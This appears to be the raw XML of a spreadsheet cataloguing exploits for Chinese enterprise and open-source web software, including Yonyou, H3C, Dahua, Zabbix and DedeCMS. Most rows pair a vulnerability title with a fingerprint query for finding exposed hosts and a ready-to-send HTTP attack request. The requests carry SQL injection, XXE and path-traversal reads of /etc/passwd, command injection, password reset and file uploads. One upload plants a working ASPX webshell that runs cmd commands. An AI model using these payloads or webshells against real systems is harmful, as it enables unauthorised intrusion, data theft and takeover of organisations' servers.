        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Content-Type:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> application/x-www-form-urlencoded</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Accept-Ldwk:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> bG91ZG9uZ3dlbmt1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
User-Agent:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> curl/8.1.2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Content-Length:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 333</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;?xml</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> version="1.0"?&gt;&lt;!DOCTYPE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> root</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> [&lt;!ENTITY</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> test</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> SYSTEM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> "file:///etc/passwd"&gt;]&gt;&lt;soapenv:Envelope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"&gt;&lt;soapenv:Header/&gt;&lt;soapenv:Body&gt;&lt;changeUserPassword&gt;&lt;username&gt;&amp;test;&lt;/username&gt;&lt;curpwd&gt;zzz&lt;/curpwd&gt;&lt;newpwd&gt;zzz123&lt;/newpwd&gt;&lt;/changeUserPassword&gt;&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;</t>
    </r>
  </si>
  <si>
    <t>Mtab书签导航程序存在SQL注入漏洞</t>
  </si>
  <si>
    <t>icon_hash="391069193"</t>
  </si>
  <si>
    <t>POST /LinkStore/getIcon HTTP/1.1
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Accept: application/json, text/plain, */*
Content-Length: 50
Accept-Encoding: gzip,deflate,br
Accept-Ldwk: bG91ZG9uZ3dlbmt1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: demo.mtab.cc
Connection: Keep-alive
{"url":"'XOR(if(now()=sysdate(),sleep(4),0))XOR'"}</t>
  </si>
  <si>
    <t>驰骋BPM系统存在SQL注入漏洞</t>
  </si>
  <si>
    <t>用友NC系统接口link存在SQL注入漏洞</t>
  </si>
  <si>
    <t>GET /portal/pt/link/content?pageId=login&amp;pk_funnode=1';waitfor%20delay%20'0:0:0'--&amp;pk_menuitem=2&amp;pageModule=3&amp;pageName=4 HTTP/1.1
Host: xx.xx.xx.xx
Accept-Encoding: identity
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Referer: http://www.baidu.com
Cache-Control: max-age=0</t>
  </si>
  <si>
    <t>科讯一卡通管理系统DataService.asmx存在SQL注入漏洞</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>body="</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="10"/>
        <color rgb="FF175CEB"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>http://www.ahkxsoft.com/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> &amp;&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> body="一卡通登录"</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /DataService.asmx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{{Hostname}}</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http://tempuri.org/ExeAppCmd</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&lt;ExeAppCmd</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&lt;str&gt;{"cmd":"get_sb_guanli","Type":"1');WAITFOR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> DELAY</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> '0:0:4'--"}&lt;/str&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
      &lt;files&gt;MTIz&lt;/files&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
    &lt;/ExeAppCmd&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
  &lt;/soap:Body&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soap:Envelope&gt;</t>
    </r>
  </si>
  <si>
    <t>usdtAdmin-收款管理系统-PermissionAC</t>
  </si>
  <si>
    <t xml:space="preserve">GET /index/index/get_trc20?key=MTI8P3BocCBwaHBpbmZvKCk7Pz4=&amp;name=test HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
</t>
  </si>
  <si>
    <t>usdtAdmin-收款管理系统-SQL</t>
  </si>
  <si>
    <t xml:space="preserve">GET /index/index/send?query=select%20sleep(5) HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
</t>
  </si>
  <si>
    <t>H3C-SecPath下一代防火墙-任意文件上传</t>
  </si>
  <si>
    <t>title="Web user login"</t>
  </si>
  <si>
    <t xml:space="preserve">POST /webui/?g=local_cert_delete_both HTTP/1.1
Host: xx.xx.xx.xx
Accept-Encoding: identity
Content-Length: 345
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Referer: http://www.baidu.com
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=ed63f728755e4a2f90d094ec09b0ed9a
--ed63f728755e4a2f90d094ec09b0ed9a
Content-Disposition: form-data; name="submit_post"
local_cert_import
--ed63f728755e4a2f90d094ec09b0ed9a
Content-Disposition: form-data; name="key_file_name"; filename="QyFlQF.php"
Content-Type: text/plain
&lt;?php echo md5('OmwiBdiyupqeAlMJ');@unlink(__file__);?&gt;
--ed63f728755e4a2f90d094ec09b0ed9a--
</t>
  </si>
  <si>
    <t>三汇网关管理软件debug.php远程命令执行漏洞</t>
  </si>
  <si>
    <t>body="text ml10 mr20" &amp;&amp; title="网关管理软件</t>
  </si>
  <si>
    <t xml:space="preserve">POST /debug.php HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
Content-Disposition: form-data; name="comdtype"
1
------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
Content-Disposition: form-data; name="cmd"
cat /etc/passwd
------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
Content-Disposition: form-data; name="run"
------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb--
</t>
  </si>
  <si>
    <t>H3C-iMC智能管理中心-RCE</t>
  </si>
  <si>
    <t>(title="用户自助服务" &amp;&amp; body="/selfservice/javax.faces.resource/") || body="/selfservice/index.xhtml"</t>
  </si>
  <si>
    <t xml:space="preserve">POST /imc/autoDeploy.xhtml;.js HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.2558.72 Safari/537.36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
</t>
  </si>
  <si>
    <t>大华-DDS数字监控系统-SQL</t>
  </si>
  <si>
    <t>app="dahua-DSS"</t>
  </si>
  <si>
    <t>H3C-iMC智能管理中心存在远程代码执行漏洞(XVE-2024-4567)（多接口）</t>
  </si>
  <si>
    <t>/byod/index.xhtml、/selfservice/login.jsf、/rpt/reportpage/loginrpt.jsf等多个接口处存在远程代码执行漏洞
POST /byod/index.xhtml HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.2558.72 Safari/537.36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t>
  </si>
  <si>
    <t>H3C-iMC智能管理中心 autoDeploy.xhtml存在远程代码执行漏洞</t>
  </si>
  <si>
    <t>POST /imc/dc3dtopo/dc2dtopo/autoDeploy.xhtml;.png HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.2558.72 Safari/537.36
Accept-Ldwk: bG91ZG9uZ3dlbmt1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t>
  </si>
  <si>
    <t>中成科信票务管理平台SeatMapHandler存在SQL注入漏洞</t>
  </si>
  <si>
    <t>body="images/login/img_distri.png"</t>
  </si>
  <si>
    <t>POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host: 
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
Method=GetZoneInfo&amp;solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%284172%3D4172%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28107%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29--+bErE</t>
  </si>
  <si>
    <t>中成科信票务管理平台 TicketManager.ashx 存在SQL注入漏洞</t>
  </si>
  <si>
    <t>POST /SystemManager/Api/TicketManager.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 61
Method=GetReServeOrder&amp;solutionId=1' WAITFOR DELAY '0:0:15'--</t>
  </si>
  <si>
    <t>迪康Defender电子文档某上传接口存在 安全管理系统文件上传漏洞</t>
  </si>
  <si>
    <t>上讯运维堡垒机 login 接口任意用户登录</t>
  </si>
  <si>
    <t>金和OA JC6存在接口未授权访问</t>
  </si>
  <si>
    <t>亿赛通电子文档安全管理系统 SecretKeyService SQL注入漏洞</t>
  </si>
  <si>
    <t>body="/CDGServer3/index.jsp"</t>
  </si>
  <si>
    <t>GET /CDGServer3/SecretKeyService?command=sameKeyName&amp;keyName=1'+WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip</t>
  </si>
  <si>
    <t>蓝凌OA webservice 任意文件读取漏洞</t>
  </si>
  <si>
    <t>用友crm-help.php-任意文件读取漏洞</t>
  </si>
  <si>
    <t>app=“用友U8CRM”</t>
  </si>
  <si>
    <t>蓝点通用管理系统存在任意文件读取漏洞</t>
  </si>
  <si>
    <t>帆软报表v9任意文件写入（绕过JSP不解析的情况，上传dll RCE）</t>
  </si>
  <si>
    <t>短视频直播打赏系统 存在任意文件读取漏洞</t>
  </si>
  <si>
    <t xml:space="preserve">"Location: https://m.baidu.com" &amp;&amp; domain!="baidu.com" </t>
  </si>
  <si>
    <t>GET /caiji/get_curl?url=file:///etc/passwd HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close</t>
  </si>
  <si>
    <t>某短视频直播打赏系统后台任意文件上传漏洞</t>
  </si>
  <si>
    <t>POST /admin/ajax/upload HTTP/1.1
Host: 127.0.0.1:81
Content-Length: 290
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqVHCE6rweLU4xoLd
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1:81
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:81/admin/stock/add?d=dsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: userid=1; PHPSESSID=300471c6cebde33867306a662af88460
Connection: close
------WebKitFormBoundaryqVHCE6rweLU4xoLd
Content-Disposition: form-data; name="type"
php
------WebKitFormBoundaryqVHCE6rweLU4xoLd
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: image/png
&lt;?php phpinfo();?&gt;
------WebKitFormBoundaryqVHCE6rweLU4xoLd--</t>
  </si>
  <si>
    <t>用友U8-Cloud系统BusinessRefAction存在SQL注入漏洞</t>
  </si>
  <si>
    <t>title="U8C"</t>
  </si>
  <si>
    <t>GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.web.reference.BusinessRefAction&amp;method=getTaskRepTreeRef&amp;taskId=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close</t>
  </si>
  <si>
    <t>Zabbix ping脚本 存在命令注入漏洞</t>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="10"/>
        <color rgb="FF175CEB"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>https://mp.weixin.qq.com/s?__biz=Mzg5MzE4MjAxMw==&amp;mid=2247484321&amp;idx=1&amp;sn=8c37c07c4e4d38925ada43a52c28db3b</t>
    </r>
  </si>
  <si>
    <t>章管家listUploadIntelligent接口存在sql注入漏洞（3）</t>
  </si>
  <si>
    <t>POST /app/message/listUploadIntelligent.htm?&amp;person_id=1&amp;unit_id=1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Content-Type: application/x-www-form-urlencoded
Content-Length: 119
pageNo=1&amp;pageSize=20&amp;keyWord=&amp;startDate=&amp;endDate=&amp;deptIds=&amp;type_id=&amp;is_read=-1 and (select*from(select%0Asleep(10))x)
POST /app/message/listUploadIntelligent.htm?token=dingtalk_token&amp;person_id=1&amp;unit_id=1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Content-Type: application/x-www-form-urlencoded
Content-Length: 119
pageNo=1&amp;pageSize=20&amp;keyWord=&amp;startDate=&amp;endDate=&amp;deptIds=&amp;type_id=&amp;is_read=-1 and (select*from(select%0Asleep(10))x)
POST /app/message/listUploadIntelligent.htm?token=dingtalk_token&amp;person_id=1&amp;unit_id=1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Cookie: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
pageNo=1&amp;pageSize=20&amp;keyWord=&amp;startDate=&amp;endDate=&amp;deptIds=&amp;type_id=&amp;is_read=-1 union select md5(123456),2,3,4,5,6,7,8,9,10,11,12 --</t>
  </si>
  <si>
    <t>润申信息科技ERP系统DefaultHandler.ashx接口存在sql注入漏洞</t>
  </si>
  <si>
    <t>body="PDCA/js/_publicCom.js"</t>
  </si>
  <si>
    <t>POST /ashx/DefaultHandler.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Connection: close
Content-Length: 115
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
action=GetDetail&amp;status=300&amp;id=1+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123')),3,32))&lt;0--</t>
  </si>
  <si>
    <t>润申信息科技ERP系统CommentStandardHandler.ashx接口存在sql注入漏洞</t>
  </si>
  <si>
    <t>POST /PDCA/ashx/CommentStandardHandler.ashx HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
action=detailInfo&amp;fileid=1+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123')),3,32))&lt;0--</t>
  </si>
  <si>
    <t>金斗云HKMP智慧商业软件queryPrintTemplate存在SQL注入漏洞</t>
  </si>
  <si>
    <t>body="金斗云 Copyright"</t>
  </si>
  <si>
    <t>POST /admin/configApp/queryPrintTemplate HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/json
{"appId":"hkmp","data":{"adminUserCode":"test1234","adminUserName":"test1234","appName":"悟空POS Win版' AND (SELECt 5 from (select(sleep(2)))x) and 'zz'='zz","configGroup":"1","mchId":"0001"},"deviceId":"hkmp","mchId":"hkmp","nonce":3621722933,"sign":"hkmp","timestamp":1719306504}</t>
  </si>
  <si>
    <t>赛蓝企业管理系统GetImportDetailJson存在SQL注入漏洞</t>
  </si>
  <si>
    <t>GET /BaseModule/ExcelImport/GetImportDetailJson?ImportId=1%27%3bWAITFOR+DELAY+%270%3a0%3a5%27--&amp;IsShow=1 HTTP/1.1
Host: {{Hostname}}</t>
  </si>
  <si>
    <t>安美数字酒店宽带运营系统weather.php任意文件读取漏洞</t>
  </si>
  <si>
    <t>app="安美数字-酒店宽带运营系统"</t>
  </si>
  <si>
    <t>GET /user/weather.php?Lang=../../../etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close</t>
  </si>
  <si>
    <t>泛微e-office10系统schema_mysql.sql敏感信息泄露漏洞</t>
  </si>
  <si>
    <t>body="eoffice_loading_tip" &amp;&amp; body="eoffice10"</t>
  </si>
  <si>
    <t>GET /eoffice10/empty_scene/db/schema_mysql.sql HTTP/1.1
Host:
Pragma:no-cache
Cache-Control:no-cache
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/120.0.0.0Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Type:application/x-www-form-urlencoded
Content-Length:70</t>
  </si>
  <si>
    <t>喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞</t>
  </si>
  <si>
    <t>body="tmp_md5_pwd"</t>
  </si>
  <si>
    <t>GET /logistics/home_warning/php/not_finish.php?do=getList&amp;lsid=(SELECT+(CASE+WHEN+(6192=6193)+THEN+''+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
Host: {{Hostname}}</t>
  </si>
  <si>
    <t>喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞</t>
  </si>
  <si>
    <t>GET /logistics/home_warning/php/stock.php?do=getList&amp;lsid=(SELECT+(CASE+WHEN+(6191=6193)+THEN+%27%27+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36</t>
  </si>
  <si>
    <t>喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞</t>
  </si>
  <si>
    <t>GET /logistics/home_warning/php/shelflife.php?do=getList&amp;lsid=(SELECT+(CASE+WHEN+(6191=6193)+THEN+%27%27+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36</t>
  </si>
  <si>
    <t>方天云智慧管理平台setImg接口存在任意文件上传漏洞</t>
  </si>
  <si>
    <t>POST /Data/setImg.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close
------21909179191068471382830692394
Content-Disposition: form-data; name="Filedata"; filename="asd.aspx"
Content-Type: image/jpeg
&lt;%@ Page Language="Jscript" validateRequest="false" %&gt;&lt;%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%&gt;
------21909179191068471382830692394--
上传地址：
http://ip/UploadFile/CustomerFile/回显路径</t>
  </si>
  <si>
    <t>银达云创-智慧校园管理系统-任意文件上传</t>
  </si>
  <si>
    <t>title="智慧综合管理平台登入"</t>
  </si>
  <si>
    <t xml:space="preserve">POST /Module/FileUpPage/FileUpAd.aspx?file_tmid=upload HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close
------21909179191068471382830692394
Content-Disposition: form-data; name="File"; filename="asd.aspx"
Content-Type: image/jpeg
&lt;%@ Page Language="Jscript" validateRequest="false" %&gt;&lt;%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%&gt;
------21909179191068471382830692394--
/imgnews/imgad/000000/upload.aspx?cmd=whoami
</t>
  </si>
  <si>
    <t>新开普智慧校园系统invoke.action远程命令执行漏洞</t>
  </si>
  <si>
    <t>WookTeam-在线团队协作工具-SQL</t>
  </si>
  <si>
    <t>title="Wookteam"</t>
  </si>
  <si>
    <t>GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cversion%28%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive</t>
  </si>
  <si>
    <t>开源-ZoneMinder-SQL</t>
  </si>
  <si>
    <t>icon_hash="-1218152116"</t>
  </si>
  <si>
    <t xml:space="preserve">/zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&amp;order=desc&amp;limit=20&amp;view=request&amp;request=watch&amp;mid=1
/zm/index.php?limit=20&amp;mid=-1%20OR%203*2*1=6%20AND%20000322=000322&amp;order=desc&amp;request=watch&amp;sort=Id&amp;view=request
</t>
  </si>
  <si>
    <t>DedeCMS--任意文件读取</t>
  </si>
  <si>
    <t>"dedecms"</t>
  </si>
  <si>
    <t xml:space="preserve">/dede/sys_verifies.php?action=view&amp;filename=../../../../../etc/passwd
</t>
  </si>
  <si>
    <t>上海建业信息科技股份-章管家-任意密码重置</t>
  </si>
  <si>
    <t xml:space="preserve">POST /app/updatePwd.htm HTTP/1.1
Host:
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
mobile=18888888888&amp;newPassword=12312dsa12&amp;equipmentName=xxxxxx&amp;version=4.0.0&amp;token=dingtalk_token
</t>
  </si>
  <si>
    <t>Apache Tomcat 信息泄露漏洞（CVE-2024-21733）</t>
  </si>
  <si>
    <t xml:space="preserve">POST / HTTP/1.1
Host: hostname
Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
